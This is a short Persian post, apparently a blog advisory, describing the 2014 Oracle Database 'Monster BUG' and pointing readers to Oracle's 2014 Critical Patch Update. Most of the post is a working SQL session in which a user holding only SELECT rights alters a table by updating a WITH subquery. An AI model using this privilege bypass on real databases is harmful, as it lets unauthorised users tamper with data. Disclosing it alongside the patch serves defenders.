در Augest سال 2014 یک باگ امنیتی در اوراکل دیتابیس شناسایی شد که کارشناسان اسم Monster BUG را روی آن گذاشتند.
و جالب است بدانید که این باگ تا آخرین ریلیز از نسخه 11g یعنی 11.2.0.4 نیز وجود دارد!!!
در تشریح این باگ بطور خلاصه: در صورتی که به کاربری در دیتابیس دسترسی Select بر روی یکی از جداول خود را بدهید، آن کاربر می تواند با روش زیر جدول مذکور را Update کند:
SQL> create user user1 identified by 123 ;
User created.
SQL> grant create session , create table to user1;
Grant succeeded.
SQL> grant select on scott.emp to user1;
Grant succeeded.
SQL> conn user1/123
Connected.
SQL> select ename , sal from scott.emp where ename='ALLEN';
ENAME SAL
---------- ----------
ALLEN 3600
1 rows selected.
SQL> update scott.emp set sal=1000 where ename='ALLEN';
update scott.emp set sal=1000 where ename='ALLEN'
*
ERROR at line 1:
ORA-01031: insufficient privileges
SQL> update (with tmp as (select * from scott.emp) select * from tmp) set sal=1000 where ename='ALLEN';
1 row updated.
SQL> commit;
Commit complete.
SQL> select ename , sal from scott.emp where ename='ALLEN';
ENAME SAL
---------- ----------
ALLEN 1000
خوشبختانه این مشکل با ارائه Critical Patch Update - CPU2014 توسط شرکت اوراکل برطرف شده است.
شما می توانید با مراجعه به بخش پشتیبانی اوراکل (Support.oracle.com) این patch را جستجو و پس از دانلود برروی دیتابیس خود نصب نمایید.لازم به توضیح است که برای دسترسی به این بخش از سایت اوراکل نیازمند اکانت MetaLink هستید و با کاربری که به طور معمول در اوراکل ایجاد می شود اجازه دسترسی به این بخش را نخواهید داشت.